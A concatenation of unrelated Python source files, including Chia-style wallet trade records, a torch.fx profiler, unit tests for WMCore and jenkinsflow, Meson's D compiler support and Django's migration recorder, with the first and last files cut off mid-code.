amount=uint64(abs(dogechia_discrepancy)),
fee_amount=uint64(0),
confirmed=False,
sent=uint32(10),
spend_bundle=dogechia_spend_bundle,
additions=dogechia_spend_bundle.additions(),
removals=dogechia_spend_bundle.removals(),
wallet_id=uint32(1),
sent_to=[],
trade_id=std_hash(spend_bundle.name() + bytes(now)),
type=uint32(TransactionType.OUTGOING_TRADE.value),
name=dogechia_spend_bundle.name(),
)
else:
tx_record = TransactionRecord(
confirmed_at_height=uint32(0),
created_at_time=uint64(int(time.time())),
to_puzzle_hash=token_bytes(),
amount=uint64(abs(dogechia_discrepancy)),
fee_amount=uint64(0),
confirmed=False,
sent=uint32(10),
spend_bundle=dogechia_spend_bundle,
additions=dogechia_spend_bundle.additions(),
removals=dogechia_spend_bundle.removals(),
wallet_id=uint32(1),
sent_to=[],
trade_id=std_hash(spend_bundle.name() + bytes(now)),
type=uint32(TransactionType.INCOMING_TRADE.value),
name=dogechia_spend_bundle.name(),
)
my_tx_records.append(tx_record)
for colour, amount in cc_discrepancies.items():
wallet = wallets[colour]
if dogechia_discrepancy > 0:
tx_record = TransactionRecord(
confirmed_at_height=uint32(0),
created_at_time=uint64(int(time.time())),
to_puzzle_hash=token_bytes(),
amount=uint64(abs(amount)),
fee_amount=uint64(0),
confirmed=False,
sent=uint32(10),
spend_bundle=spend_bundle,
additions=spend_bundle.additions(),
removals=spend_bundle.removals(),
wallet_id=wallet.id(),
sent_to=[],
trade_id=std_hash(spend_bundle.name() + bytes(now)),
type=uint32(TransactionType.OUTGOING_TRADE.value),
name=spend_bundle.name(),
)
else:
tx_record = TransactionRecord(
confirmed_at_height=uint32(0),
created_at_time=uint64(int(time.time())),
to_puzzle_hash=token_bytes(),
amount=uint64(abs(amount)),
fee_amount=uint64(0),
confirmed=False,
sent=uint32(10),
spend_bundle=spend_bundle,
additions=spend_bundle.additions(),
removals=spend_bundle.removals(),
wallet_id=wallet.id(),
sent_to=[],
trade_id=std_hash(spend_bundle.name() + bytes(now)),
type=uint32(TransactionType.INCOMING_TRADE.value),
name=token_bytes(),
)
my_tx_records.append(tx_record)
tx_record = TransactionRecord(
confirmed_at_height=uint32(0),
created_at_time=uint64(int(time.time())),
to_puzzle_hash=token_bytes(),
amount=uint64(0),
fee_amount=uint64(0),
confirmed=False,
sent=uint32(0),
spend_bundle=spend_bundle,
additions=spend_bundle.additions(),
removals=spend_bundle.removals(),
wallet_id=uint32(0),
sent_to=[],
trade_id=std_hash(spend_bundle.name() + bytes(now)),
type=uint32(TransactionType.OUTGOING_TRADE.value),
name=spend_bundle.name(),
)
now = uint64(int(time.time()))
trade_record: TradeRecord = TradeRecord(
confirmed_at_index=uint32(0),
accepted_at_time=now,
created_at_time=now,
my_offer=False,
sent=uint32(0),
spend_bundle=offer_spend_bundle,
tx_spend_bundle=spend_bundle,
additions=spend_bundle.additions(),
removals=spend_bundle.removals(),
trade_id=std_hash(spend_bundle.name() + bytes(now)),
status=uint32(TradeStatus.PENDING_CONFIRM.value),
sent_to=[],
)
await self.save_trade(trade_record)
await self.wallet_state_manager.add_pending_transaction(tx_record)
for tx in my_tx_records:
await self.wallet_state_manager.add_transaction(tx)
return True, trade_record, None
|
py | 1a37c1e64f7abf6ced5facbf68cbcf32076821ef | def buddy(start, limit):
for i in range(start, limit):
res=prime(i)
if res>i:
res2=prime(res-1)
if (res2-i)==1:
return [i,res-1]
return "Nothing"
def prime(n):
total=1
for i in range(2, int(n**0.5)+1):
if n%i==0:
total+=(i)
if i==n//i: continue
total+=(n//i)
return total |
py | 1a37c271979d17b602bf6455193078c9d2fba6d3 | from typing import Any
import torch
from torch import fx
class NodeProfiler(fx.Interpreter):
"""
This is basically a variant of shape prop in
https://github.com/pytorch/pytorch/blob/74849d9188de30d93f7c523d4eeceeef044147a9/torch/fx/passes/shape_prop.py#L65.
Instead of propagating just the shape, we record all the intermediate node Tensor values.
This is useful to debug some of lowering pass issue where we want to check a specific
tensor value. Note that output value can be tuple(Tensor) as well as Tensor.
"""
def __init__(self, module: fx.GraphModule):
super().__init__(module)
self.execution_time = {}
self.node_map = {}
self.iter = 100
def run_node(self, n: fx.Node) -> Any:
result = super().run_node(n)
if n.op not in {"call_function", "call_method", "call_module"}:
return result
torch.cuda.synchronize()
start_event = torch.cuda.Event(enable_timing=True)
end_event = torch.cuda.Event(enable_timing=True)
start_event.record()
for _ in range(self.iter):
result = super().run_node(n)
end_event.record()
torch.cuda.synchronize()
self.execution_time[f"{n.name}"] = (
start_event.elapsed_time(end_event) / self.iter
)
self.node_map[n.name] = n
return result
def propagate(self, *args):
"""
Run `module` via interpretation and return the result and
record the shape and type of each node.
Args:
*args (Tensor): the sample input.
Returns:
Any: The value returned from executing the Module
"""
return super().run(*args)
|
py | 1a37c29cd460ee60aeed08d01ea052fbaaa4670e | print(ord(input())-64)
|
py | 1a37c3698bdbae5da35fa55ab31bc9d0d1c594c0 | # Custom imports
from .semi_epoch_based_runner import SemiEpochBasedRunner
|
py | 1a37c4a13fedc8747fa577f3332b61c5c3f5b71a | import unicodedata
from .add_whitespace_around_character import AddWhitespaceAroundCharacter
class AddWhitespaceAroundPunctuation(AddWhitespaceAroundCharacter):
"""
Recognize punctuation characters and add whitespace around each punctuation character
E.g.
>>> from uttut.pipeline.ops.add_whitespace_around_punctuation import (
AddWhitespaceAroundPunctuation)
>>> op = AddWhitespaceAroundPunctuation()
>>> output_seq, label_aligner = op.transform("GB,薄餡亂入")
>>> output_labels = label_aligner.transform([1, 1, 2, 3, 3, 4, 5])
>>> output_seq
"GB , 薄餡亂入"
>>> output_labels
[1, 1, 0, 2, 0, 3, 3, 4, 5]
>>> label_aligner.inverse_transform(output_labels)
[1, 1, 2, 3, 3, 4, 5]
"""
def _is_valid_char(self, char: str) -> bool:
return is_punctuation(char)
def is_punctuation(char: str) -> bool:
"""Check whether char is a punctuation character.
This code is copied from Bert `tokenization.py`.
We treat all non-letter/number ASCII as punctuation.
Characters such as "^", "$", and "`" are not in the Unicode
Punctuation class but we treat them as punctuation anyways, for
consistency.
"""
code_point = ord(char)
if ((
code_point >= 33 and code_point <= 47) or (
code_point >= 58 and code_point <= 64) or (
code_point >= 91 and code_point <= 96) or (
code_point >= 123 and code_point <= 126)
):
return True
cat = unicodedata.category(char)
# For more details, please take a look at
# https://www.fileformat.info/info/unicode/category/index.htm
if cat.startswith("P"):
return True
return False
|
py | 1a37c55ec2e92d11352b8f040612c27d275994a3 | """
Unit tests for Unified/Monitor.py module
Author: Valentin Kuznetsov <vkuznet [AT] gmail [DOT] com>
"""
from __future__ import division, print_function
import time
# system modules
import unittest
from copy import deepcopy
# WMCore modules
from WMCore.MicroService.Unified.MSMonitor import MSMonitor
from WMQuality.Emulators.EmulatedUnitTestCase import EmulatedUnitTestCase
from WMQuality.Emulators.ReqMgrAux.MockReqMgrAux import MockReqMgrAux
class MSMonitorTest(EmulatedUnitTestCase):
"Unit test for Monitor module"
def setUp(self):
"init test class"
self.msConfig = {'verbose': False,
'group': 'DataOps',
'interval': 1 * 60,
'updateInterval': 0,
'enableStatusTransition': True,
'reqmgr2Url': 'https://cmsweb-testbed.cern.ch/reqmgr2',
'reqmgrCacheUrl': 'https://cmsweb-testbed.cern.ch/couchdb/reqmgr_workload_cache',
'phedexUrl': 'https://cmsweb-testbed.cern.ch/phedex/datasvc/json/prod',
'dbsUrl': 'https://cmsweb-testbed.cern.ch/dbs/int/global/DBSReader'}
self.ms = MSMonitor(self.msConfig)
self.ms.reqmgrAux = MockReqMgrAux()
super(MSMonitorTest, self).setUp()
def testUpdateCaches(self):
"""
Test the getCampaignConfig method
"""
campaigns, transfersDocs = self.ms.updateCaches()
self.assertNotEqual(transfersDocs, [])
self.assertEqual(len(transfersDocs[0]['transfers']), 1)
self.assertTrue(time.time() > transfersDocs[0]['lastUpdate'], 1)
self.assertNotEqual(campaigns, [])
for cname, cdict in campaigns.items():
self.assertEqual(cname, cdict['CampaignName'])
self.assertEqual(isinstance(cdict, dict), True)
self.assertNotEqual(cdict.get('CampaignName', {}), {})
def testGetTransferInfo(self):
"""
Test the getTransferInfo method
"""
_, transfersDocs = self.ms.updateCaches()
transfersDocs[0]['transfers'] = []
originalTransfers = deepcopy(transfersDocs)
self.ms.getTransferInfo(transfersDocs)
self.assertNotEqual(transfersDocs, [])
self.assertEqual(len(transfersDocs), len(originalTransfers))
for rec in transfersDocs:
self.assertEqual(isinstance(rec, dict), True)
keys = sorted(['workflowName', 'lastUpdate', 'transfers'])
self.assertEqual(keys, sorted(rec.keys()))
self.assertTrue(time.time() >= rec['lastUpdate'])
def testCompletion(self):
"""
Test the completion method
"""
campaigns, transfersDocs = self.ms.updateCaches()
transfersDocs.append(deepcopy(transfersDocs[0]))
transfersDocs.append(deepcopy(transfersDocs[0]))
transfersDocs[0]['transfers'] = []
transfersDocs[0]['workflowName'] = 'workflow_0'
transfersDocs[1]['transfers'][0]['completion'].append(100)
transfersDocs[1]['workflowName'] = 'workflow_1'
transfersDocs[2]['workflowName'] = 'workflow_2'
self.assertEqual(len(transfersDocs), 3)
completedWfs = self.ms.getCompletedWorkflows(transfersDocs, campaigns)
self.assertEqual(len(completedWfs), 2)
def testUpdateTransferInfo(self):
"""
Test the updateTransferInfo method
"""
_, transferRecords = self.ms.updateCaches()
failed = self.ms.updateTransferDocs(transferRecords)
self.assertEqual(len(failed), len(transferRecords))
if __name__ == '__main__':
unittest.main()
|
py | 1a37c56a60c5c84a073359fbe7b52787d2d426ef | # Copyright (c) 2012 - 2015 Lars Hupfeldt Nielsen, Hupfeldt IT
# All rights reserved. This work is under a BSD license, see LICENSE.TXT.
from pytest import raises
from jenkinsflow.flow import parallel, serial, FlowScopeException
from .framework import api_select
def test_flow_scope_job(api_type):
with api_select.api(__file__, api_type) as api:
api.flow_job()
api.job('j1', max_fails=0, expect_invocations=0, expect_order=None)
api.job('j2', max_fails=0, expect_invocations=0, expect_order=None)
with raises(FlowScopeException):
with serial(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
pass
ctrl1.invoke('j1')
with raises(FlowScopeException):
with parallel(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
pass
ctrl1.invoke('j1')
with raises(FlowScopeException):
with serial(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
with ctrl1.parallel() as ctrl2:
pass
ctrl2.invoke('j2')
with raises(FlowScopeException):
with parallel(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
with ctrl1.serial() as ctrl2:
ctrl2.invoke('j1')
ctrl2.invoke('j2')
def test_flow_scope_serial(api_type):
with api_select.api(__file__, api_type) as api:
api.flow_job()
with raises(FlowScopeException):
with serial(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
pass
with ctrl1.serial(1):
pass
with raises(FlowScopeException):
with serial(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
pass
with ctrl1.parallel(1):
pass
with raises(FlowScopeException):
with serial(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
with ctrl1.serial() as ctrl2:
ctrl2.serial(1)
ctrl2.serial(1)
with raises(FlowScopeException):
with serial(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
with ctrl1.serial() as ctrl2:
ctrl1.serial(1)
def test_flow_scope_parallel(api_type):
with api_select.api(__file__, api_type) as api:
api.flow_job()
with raises(FlowScopeException):
with parallel(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
pass
with ctrl1.parallel(1):
pass
with raises(FlowScopeException):
with parallel(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
pass
with ctrl1.serial(1):
pass
with raises(FlowScopeException):
with parallel(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
with ctrl1.parallel() as ctrl2:
ctrl2.parallel(1)
ctrl2.parallel(1)
with raises(FlowScopeException):
with parallel(api, 10, job_name_prefix=api.job_name_prefix) as ctrl1:
with ctrl1.parallel() as ctrl2:
ctrl1.parallel(1)
|
py | 1a37c634fac821321a52b897ee8d04d5ce73d590 | # Copyright 2012-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path, subprocess
from ..mesonlib import (
EnvironmentException, MachineChoice, version_compare, is_windows, is_osx
)
from .compilers import (
CompilerType,
d_dmd_buildtype_args,
d_gdc_buildtype_args,
d_ldc_buildtype_args,
clike_debug_args,
Compiler,
CompilerArgs,
)
from .mixins.gnu import get_gcc_soname_args, gnu_color_args, gnu_optimization_args
d_feature_args = {'gcc': {'unittest': '-funittest',
'debug': '-fdebug',
'version': '-fversion',
'import_dir': '-J'
},
'llvm': {'unittest': '-unittest',
'debug': '-d-debug',
'version': '-d-version',
'import_dir': '-J'
},
'dmd': {'unittest': '-unittest',
'debug': '-debug',
'version': '-version',
'import_dir': '-J'
}
}
ldc_optimization_args = {'0': [],
'g': [],
'1': ['-O1'],
'2': ['-O2'],
'3': ['-O3'],
's': ['-Os'],
}
dmd_optimization_args = {'0': [],
'g': [],
'1': ['-O'],
'2': ['-O'],
'3': ['-O'],
's': ['-O'],
}
class DCompiler(Compiler):
mscrt_args = {
'none': ['-mscrtlib='],
'md': ['-mscrtlib=msvcrt'],
'mdd': ['-mscrtlib=msvcrtd'],
'mt': ['-mscrtlib=libcmt'],
'mtd': ['-mscrtlib=libcmtd'],
}
def __init__(self, exelist, version, for_machine: MachineChoice, arch, **kwargs):
self.language = 'd'
super().__init__(exelist, version, for_machine, **kwargs)
self.id = 'unknown'
self.arch = arch
def sanity_check(self, work_dir, environment):
source_name = os.path.join(work_dir, 'sanity.d')
output_name = os.path.join(work_dir, 'dtest')
with open(source_name, 'w') as ofile:
ofile.write('''void main() { }''')
pc = subprocess.Popen(self.exelist + self.get_output_args(output_name) + self.get_target_arch_args() + [source_name], cwd=work_dir)
pc.wait()
if pc.returncode != 0:
raise EnvironmentException('D compiler %s can not compile programs.' % self.name_string())
if subprocess.call(output_name) != 0:
raise EnvironmentException('Executables created by D compiler %s are not runnable.' % self.name_string())
def needs_static_linker(self):
return True
def name_string(self):
return ' '.join(self.exelist)
def get_exelist(self):
return self.exelist
def get_linker_exelist(self):
return self.exelist[:]
def get_output_args(self, target):
return ['-of=' + target]
def get_linker_output_args(self, target):
return ['-of=' + target]
def get_include_args(self, path, is_system):
return ['-I=' + path]
def compute_parameters_with_absolute_paths(self, parameter_list, build_dir):
for idx, i in enumerate(parameter_list):
if i[:3] == '-I=':
parameter_list[idx] = i[:3] + os.path.normpath(os.path.join(build_dir, i[3:]))
if i[:4] == '-L-L':
parameter_list[idx] = i[:4] + os.path.normpath(os.path.join(build_dir, i[4:]))
if i[:5] == '-L=-L':
parameter_list[idx] = i[:5] + os.path.normpath(os.path.join(build_dir, i[5:]))
if i[:6] == '-Wl,-L':
parameter_list[idx] = i[:6] + os.path.normpath(os.path.join(build_dir, i[6:]))
return parameter_list
def get_warn_args(self, level):
return ['-wi']
def get_werror_args(self):
return ['-w']
def get_dependency_gen_args(self, outtarget, outfile):
# DMD and LDC does not currently return Makefile-compatible dependency info.
return []
def get_linker_search_args(self, dirname):
# -L is recognized as "add this to the search path" by the linker,
# while the compiler recognizes it as "pass to linker".
return ['-Wl,-L' + dirname]
def get_coverage_args(self):
return ['-cov']
def get_preprocess_only_args(self):
return ['-E']
def get_compile_only_args(self):
return ['-c']
def depfile_for_object(self, objfile):
return objfile + '.' + self.get_depfile_suffix()
def get_depfile_suffix(self):
return 'deps'
def get_pic_args(self):
if is_windows():
return []
return ['-fPIC']
def get_std_shared_lib_link_args(self):
return ['-shared']
def get_soname_args(self, *args):
# FIXME: Make this work for cross-compiling
if is_windows():
return []
elif is_osx():
soname_args = get_gcc_soname_args(CompilerType.GCC_OSX, *args)
if soname_args:
return ['-Wl,' + ','.join(soname_args)]
return []
return get_gcc_soname_args(CompilerType.GCC_STANDARD, *args)
def get_feature_args(self, kwargs, build_to_src):
res = []
if 'unittest' in kwargs:
unittest = kwargs.pop('unittest')
unittest_arg = d_feature_args[self.id]['unittest']
if not unittest_arg:
raise EnvironmentException('D compiler %s does not support the "unittest" feature.' % self.name_string())
if unittest:
res.append(unittest_arg)
if 'debug' in kwargs:
debug_level = -1
debugs = kwargs.pop('debug')
if not isinstance(debugs, list):
debugs = [debugs]
debug_arg = d_feature_args[self.id]['debug']
if not debug_arg:
raise EnvironmentException('D compiler %s does not support conditional debug identifiers.' % self.name_string())
# Parse all debug identifiers and the largest debug level identifier
for d in debugs:
if isinstance(d, int):
if d > debug_level:
debug_level = d
elif isinstance(d, str) and d.isdigit():
if int(d) > debug_level:
debug_level = int(d)
else:
res.append('{0}={1}'.format(debug_arg, d))
if debug_level >= 0:
res.append('{0}={1}'.format(debug_arg, debug_level))
if 'versions' in kwargs:
version_level = -1
versions = kwargs.pop('versions')
if not isinstance(versions, list):
versions = [versions]
version_arg = d_feature_args[self.id]['version']
if not version_arg:
raise EnvironmentException('D compiler %s does not support conditional version identifiers.' % self.name_string())
# Parse all version identifiers and the largest version level identifier
for v in versions:
if isinstance(v, int):
if v > version_level:
version_level = v
elif isinstance(v, str) and v.isdigit():
if int(v) > version_level:
version_level = int(v)
else:
res.append('{0}={1}'.format(version_arg, v))
if version_level >= 0:
res.append('{0}={1}'.format(version_arg, version_level))
if 'import_dirs' in kwargs:
import_dirs = kwargs.pop('import_dirs')
if not isinstance(import_dirs, list):
import_dirs = [import_dirs]
import_dir_arg = d_feature_args[self.id]['import_dir']
if not import_dir_arg:
raise EnvironmentException('D compiler %s does not support the "string import directories" feature.' % self.name_string())
for idir_obj in import_dirs:
basedir = idir_obj.get_curdir()
for idir in idir_obj.get_incdirs():
# Avoid superfluous '/.' at the end of paths when d is '.'
if idir not in ('', '.'):
expdir = os.path.join(basedir, idir)
else:
expdir = basedir
srctreedir = os.path.join(build_to_src, expdir)
res.append('{0}{1}'.format(import_dir_arg, srctreedir))
if kwargs:
raise EnvironmentException('Unknown D compiler feature(s) selected: %s' % ', '.join(kwargs.keys()))
return res
def get_buildtype_linker_args(self, buildtype):
if buildtype != 'plain':
return self.get_target_arch_args()
return []
def get_std_exe_link_args(self):
return []
def gen_import_library_args(self, implibname):
return ['-Wl,--out-implib=' + implibname]
def build_rpath_args(self, build_dir, from_dir, rpath_paths, build_rpath, install_rpath):
if is_windows():
return []
# This method is to be used by LDC and DMD.
# GDC can deal with the verbatim flags.
if not rpath_paths and not install_rpath:
return []
paths = ':'.join([os.path.join(build_dir, p) for p in rpath_paths])
if build_rpath != '':
paths += ':' + build_rpath
if len(paths) < len(install_rpath):
padding = 'X' * (len(install_rpath) - len(paths))
if not paths:
paths = padding
else:
paths = paths + ':' + padding
return ['-Wl,-rpath,{}'.format(paths)]
def _get_compiler_check_args(self, env, extra_args, dependencies, mode='compile'):
if callable(extra_args):
extra_args = extra_args(mode)
if extra_args is None:
extra_args = []
elif isinstance(extra_args, str):
extra_args = [extra_args]
if dependencies is None:
dependencies = []
elif not isinstance(dependencies, list):
dependencies = [dependencies]
# Collect compiler arguments
args = CompilerArgs(self)
for d in dependencies:
# Add compile flags needed by dependencies
args += d.get_compile_args()
if mode == 'link':
# Add link flags needed to find dependencies
args += d.get_link_args()
if mode == 'compile':
# Add DFLAGS from the env
args += env.coredata.get_external_args(self.for_machine, self.language)
elif mode == 'link':
# Add LDFLAGS from the env
args += env.coredata.get_external_link_args(self.for_machine, self.language)
# extra_args must override all other arguments, so we add them last
args += extra_args
return args
def compiles(self, code, env, *, extra_args=None, dependencies=None, mode='compile'):
args = self._get_compiler_check_args(env, extra_args, dependencies, mode)
with self.cached_compile(code, env.coredata, extra_args=args, mode=mode) as p:
return p.returncode == 0, p.cached
def has_multi_arguments(self, args, env):
return self.compiles('int i;\n', env, extra_args=args)
def get_target_arch_args(self):
# LDC2 on Windows targets to current OS architecture, but
# it should follow the target specified by the MSVC toolchain.
if is_windows():
if self.arch == 'x86_64':
return ['-m64']
return ['-m32']
return []
@classmethod
def translate_args_to_nongnu(cls, args):
dcargs = []
# Translate common arguments to flags the LDC/DMD compilers
# can understand.
# The flags might have been added by pkg-config files,
# and are therefore out of the user's control.
for arg in args:
# Translate OS specific arguments first.
osargs = []
if is_windows():
osargs = cls.translate_arg_to_windows(arg)
elif is_osx():
osargs = cls.translate_arg_to_osx(arg)
if osargs:
dcargs.extend(osargs)
continue
# Translate common D arguments here.
if arg == '-pthread':
continue
if arg.startswith('-fstack-protector'):
continue
if arg.startswith('-D'):
continue
if arg.startswith('-Wl,'):
# Translate linker arguments here.
linkargs = arg[arg.index(',') + 1:].split(',')
for la in linkargs:
dcargs.append('-L=' + la.strip())
continue
elif arg.startswith(('-link-defaultlib', '-linker', '-link-internally', '-linkonce-templates', '-lib')):
# these are special arguments to the LDC linker call,
# arguments like "-link-defaultlib-shared" do *not*
# denote a library to be linked, but change the default
# Phobos/DRuntime linking behavior, while "-linker" sets the
# default linker.
dcargs.append(arg)
continue
elif arg.startswith('-l'):
# translate library link flag
dcargs.append('-L=' + arg)
continue
elif arg.startswith('-isystem'):
# translate -isystem system include path
# this flag might sometimes be added by C library Cflags via
# pkg-config.
# NOTE: -isystem and -I are not 100% equivalent, so this is just
# a workaround for the most common cases.
if arg.startswith('-isystem='):
dcargs.append('-I=' + arg[9:])
else:
dcargs.append('-I')
continue
elif arg.startswith('-L/') or arg.startswith('-L./'):
# we need to handle cases where -L is set by e.g. a pkg-config
# setting to select a linker search path. We can however not
# unconditionally prefix '-L' with '-L' because the user might
# have set this flag too to do what it is intended to for this
# compiler (pass flag through to the linker)
# Hence, we guess here whether the flag was intended to pass
# a linker search path.
# Make sure static library files are passed properly to the linker.
if arg.endswith('.a') or arg.endswith('.lib'):
if arg.startswith('-L='):
farg = arg[3:]
else:
farg = arg[2:]
if len(farg) > 0 and not farg.startswith('-'):
dcargs.append('-L=' + farg)
continue
dcargs.append('-L=' + arg)
continue
elif not arg.startswith('-') and arg.endswith(('.a', '.lib')):
# ensure static libraries are passed through to the linker
dcargs.append('-L=' + arg)
continue
else:
dcargs.append(arg)
return dcargs
@classmethod
def translate_arg_to_windows(cls, arg):
args = []
if arg.startswith('-Wl,'):
# Translate linker arguments here.
linkargs = arg[arg.index(',') + 1:].split(',')
for la in linkargs:
if la.startswith('--out-implib='):
# Import library name
args.append('-L=/IMPLIB:' + la[13:].strip())
elif arg.startswith('-mscrtlib='):
args.append(arg)
mscrtlib = arg[10:].lower()
if cls is LLVMDCompiler:
# Default crt libraries for LDC2 must be excluded for other
# selected crt options.
if mscrtlib != 'libcmt':
args.append('-L=/NODEFAULTLIB:libcmt')
args.append('-L=/NODEFAULTLIB:libvcruntime')
# Fixes missing definitions for printf-functions in VS2017
if mscrtlib.startswith('msvcrt'):
args.append('-L=/DEFAULTLIB:legacy_stdio_definitions.lib')
return args
@classmethod
def translate_arg_to_osx(cls, arg):
args = []
if arg.startswith('-install_name'):
args.append('-L=' + arg)
return args
def get_debug_args(self, is_debug):
ddebug_args = []
if is_debug:
ddebug_args = [d_feature_args[self.id]['debug']]
return clike_debug_args[is_debug] + ddebug_args
def get_crt_args(self, crt_val, buildtype):
if not is_windows():
return []
if crt_val in self.mscrt_args:
return self.mscrt_args[crt_val]
assert(crt_val == 'from_buildtype')
# Match what build type flags used to do.
if buildtype == 'plain':
return []
elif buildtype == 'debug':
return self.mscrt_args['mdd']
elif buildtype == 'debugoptimized':
return self.mscrt_args['md']
elif buildtype == 'release':
return self.mscrt_args['md']
elif buildtype == 'minsize':
return self.mscrt_args['md']
else:
assert(buildtype == 'custom')
raise EnvironmentException('Requested C runtime based on buildtype, but buildtype is "custom".')
def get_crt_compile_args(self, crt_val, buildtype):
return []
def get_crt_link_args(self, crt_val, buildtype):
return []
def thread_link_flags(self, env):
return ['-pthread']
class GnuDCompiler(DCompiler):
def __init__(self, exelist, version, for_machine: MachineChoice, arch, **kwargs):
DCompiler.__init__(self, exelist, version, for_machine, arch, **kwargs)
self.id = 'gcc'
default_warn_args = ['-Wall', '-Wdeprecated']
self.warn_args = {'0': [],
'1': default_warn_args,
'2': default_warn_args + ['-Wextra'],
'3': default_warn_args + ['-Wextra', '-Wpedantic']}
self.base_options = ['b_colorout', 'b_sanitize', 'b_staticpic', 'b_vscrt']
self._has_color_support = version_compare(self.version, '>=4.9')
# dependencies were implemented before, but broken - support was fixed in GCC 7.1+
# (and some backported versions)
self._has_deps_support = version_compare(self.version, '>=7.1')
def get_colorout_args(self, colortype):
if self._has_color_support:
return gnu_color_args[colortype][:]
return []
def get_dependency_gen_args(self, outtarget, outfile):
if not self._has_deps_support:
return []
return ['-MD', '-MQ', outtarget, '-MF', outfile]
def get_output_args(self, target):
return ['-o', target]
def get_linker_output_args(self, target):
return ['-o', target]
def get_include_args(self, path, is_system):
return ['-I' + path]
def get_warn_args(self, level):
return self.warn_args[level]
def get_werror_args(self):
return ['-Werror']
def get_linker_search_args(self, dirname):
return ['-L' + dirname]
def get_coverage_args(self):
return []
def get_buildtype_args(self, buildtype):
return d_gdc_buildtype_args[buildtype]
def compute_parameters_with_absolute_paths(self, parameter_list, build_dir):
for idx, i in enumerate(parameter_list):
if i[:2] == '-I' or i[:2] == '-L':
parameter_list[idx] = i[:2] + os.path.normpath(os.path.join(build_dir, i[2:]))
return parameter_list
def build_rpath_args(self, build_dir, from_dir, rpath_paths, build_rpath, install_rpath):
return self.build_unix_rpath_args(build_dir, from_dir, rpath_paths, build_rpath, install_rpath)
def get_optimization_args(self, optimization_level):
return gnu_optimization_args[optimization_level]
class LLVMDCompiler(DCompiler):
def __init__(self, exelist, version, for_machine: MachineChoice, arch, **kwargs):
DCompiler.__init__(self, exelist, version, for_machine, arch, **kwargs)
self.id = 'llvm'
self.base_options = ['b_coverage', 'b_colorout', 'b_vscrt']
def get_colorout_args(self, colortype):
if colortype == 'always':
return ['-enable-color']
return []
def get_warn_args(self, level):
if level == '2' or level == '3':
return ['-wi', '-dw']
elif level == '1':
return ['-wi']
else:
return []
def get_buildtype_args(self, buildtype):
if buildtype != 'plain':
return self.get_target_arch_args() + d_ldc_buildtype_args[buildtype]
return d_ldc_buildtype_args[buildtype]
def get_pic_args(self):
return ['-relocation-model=pic']
def get_crt_link_args(self, crt_val, buildtype):
return self.get_crt_args(crt_val, buildtype)
@classmethod
def unix_args_to_native(cls, args):
return cls.translate_args_to_nongnu(args)
def get_optimization_args(self, optimization_level):
return ldc_optimization_args[optimization_level]
class DmdDCompiler(DCompiler):
def __init__(self, exelist, version, for_machine: MachineChoice, arch, **kwargs):
DCompiler.__init__(self, exelist, version, for_machine, arch, **kwargs)
self.id = 'dmd'
self.base_options = ['b_coverage', 'b_colorout', 'b_vscrt']
def get_colorout_args(self, colortype):
if colortype == 'always':
return ['-color=on']
return []
def get_buildtype_args(self, buildtype):
if buildtype != 'plain':
return self.get_target_arch_args() + d_dmd_buildtype_args[buildtype]
return d_dmd_buildtype_args[buildtype]
def get_std_exe_link_args(self):
if is_windows():
# DMD links against D runtime only when main symbol is found,
# so these needs to be inserted when linking static D libraries.
if self.arch == 'x86_64':
return ['phobos64.lib']
elif self.arch == 'x86_mscoff':
return ['phobos32mscoff.lib']
return ['phobos.lib']
return []
def get_std_shared_lib_link_args(self):
libname = 'libphobos2.so'
if is_windows():
if self.arch == 'x86_64':
libname = 'phobos64.lib'
elif self.arch == 'x86_mscoff':
libname = 'phobos32mscoff.lib'
else:
libname = 'phobos.lib'
return ['-shared', '-defaultlib=' + libname]
def get_target_arch_args(self):
# DMD32 and DMD64 on 64-bit Windows defaults to 32-bit (OMF).
# Force the target to 64-bit in order to stay consistent
# across the different platforms.
if is_windows():
if self.arch == 'x86_64':
return ['-m64']
elif self.arch == 'x86_mscoff':
return ['-m32mscoff']
return ['-m32']
return []
def get_crt_compile_args(self, crt_val, buildtype):
return self.get_crt_args(crt_val, buildtype)
@classmethod
def unix_args_to_native(cls, args):
return cls.translate_args_to_nongnu(args)
def get_optimization_args(self, optimization_level):
return dmd_optimization_args[optimization_level]
|
py | 1a37c6b7d069d77e0623fa248d80c525550f39f3 | from django.apps.registry import Apps
from django.db import DatabaseError, models
from django.utils.functional import classproperty
from django.utils.timezone import now
from .exceptions import MigrationSchemaMissing
class MigrationRecorder:
"""
Deal with storing migration records in the database.
Because this table is actually itself used for dealing with model
creation, it's the one thing we can't do normally via migrations.
We manually handle table creation/schema updating (using schema backend)
and then have a floating model to do queries with.
If a migration is unapplied its row is removed from the table. Having
a row in the table always means a migration is applied.
"""
_migration_class = None
@classproperty
def Migration(cls):
"""
Lazy load to avoid AppRegistryNotReady if installed apps import
MigrationRecorder.
"""
if cls._migration_class is None:
class Migration(models.Model):
app = models.CharField(max_length=255)
name = models.CharField(max_length=255)
applied = models.DateTimeField(default=now)
class Meta:
apps = Apps()
app_label = 'migrations'
db_table = 'django_migrations'
def __str__(self):
return 'Migration %s for %s' % (self.name, self.app)
cls._migration_class = Migration
return cls._migration_class
def __init__(self, connection):
self.connection = connection
@property
def migration_qs(self):
return self.Migration.objects.using(self.connection.alias)
def has_table(self):
"""Return True if the django_migrations table exists."""
with self.connection.cursor() as cursor:
tables = self.connection.introspection.table_names(cursor)
return self.Migration._meta.db_table in tables
def ensure_schema(self):
"""Ensure the table exists and has the correct schema."""
# If the table's there, that's fine - we've never changed its schema
# in the codebase.
if self.has_table():
return
# Make the table
try:
with self.connection.schema_editor() as editor:
editor.create_model(self.Migration)
except DatabaseError as exc:
